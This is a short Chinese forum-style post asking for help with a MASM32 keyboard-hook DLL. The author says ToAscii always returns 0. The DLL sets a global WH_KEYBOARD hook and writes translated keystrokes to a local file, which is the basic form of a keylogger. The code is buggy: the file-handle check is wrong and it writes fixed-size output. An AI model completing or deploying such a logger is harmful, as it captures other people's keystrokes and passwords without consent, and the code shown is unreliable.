一个有问题的键盘hook

昨天写了一个键盘钩子,,不知道为什么总是无法写入到指定文件,经过测试发现ToAscii后eax总是为0,郁闷ing。。。

代码如下:

.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
.data
hInstance    dd    ?
.data?
hHook    dd    ?
hFile    dd    ?
szAscii        db    4 dup (?)
lpNumWritten    dd    ?
.const
szFileName    db    ’1.txt’,0
.code
DllEntry proc _hInstance,_dwReason,_dwReserved

push _hInstance
pop hInstance
mov eax,_dwReason
.if eax==DLL_PROCESS_ATTACH
invoke CreateFile,offset szFileName,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,0
.if eax
mov hFile,eax
mov eax,TRUE
ret
.endif
.elseif eax==DLL_PROCESS_DETACH
invoke CloseHandle,hFile
mov eax,TRUE
ret
.else
mov eax,TRUE
ret
.endif
ret
DllEntry endp
ProcHook proc _dwCode,_wParam,_lParam
LOCAL @szKeyBoardState[256]:byte
mov eax,_lParam
shr eax,31
.if eax
invoke CallNextHookEx,hHook,_dwCode,_wParam,_lParam
invoke GetKeyboardState,addr @szKeyBoardState
invoke GetKeyState,VK_SHIFT
mov @szKeyBoardState+VK_SHIFT,al
mov ecx,_lParam
shr ecx,16
invoke ToAscii,_wParam,ecx,addr @szKeyBoardState,addr szAscii,0
mov byte ptr szAscii [eax],0
invoke WriteFile,hFile,addr szAscii,sizeof szAscii,offset lpNumWritten,0
.endif
ret

ProcHook endp
InstallHook proc

invoke SetWindowsHookEx,WH_KEYBOARD,offset ProcHook,hInstance,0
mov hHook,eax
ret

InstallHook endp
UninstallHook proc

invoke UnhookWindowsHookEx,hHook
ret

UninstallHook endp
end DllEntry